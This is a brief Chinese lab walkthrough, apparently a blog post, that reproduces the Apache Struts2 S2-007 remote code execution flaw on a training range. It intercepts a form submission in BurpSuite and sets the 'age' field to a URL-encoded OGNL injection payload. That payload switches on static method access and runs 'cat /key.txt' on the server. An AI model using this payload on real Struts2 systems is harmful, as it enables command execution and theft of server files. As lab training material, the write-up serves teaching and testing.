- 打开靶场,任意填写表单并提交
- 使用BrupSuite捕获报文
- 修改age的值为:
- %27+%2B+%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew+java.lang.Boolean%28%22false%22%29+%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%27cat /key.txt%27%29.getInputStream%28%29%29%29+%2B+%27
- 得到KEY
墨者学院_Apache Struts2远程代码执行漏洞(S2-007)复现
最新推荐文章于 2023-11-12 19:27:08 发布
本文介绍如何通过设置BurpSuite拦截HTTP请求,修改特定参数利用反射型漏洞,最终获取服务器上的敏感文件内容。
553

被折叠的 条评论
为什么被折叠?



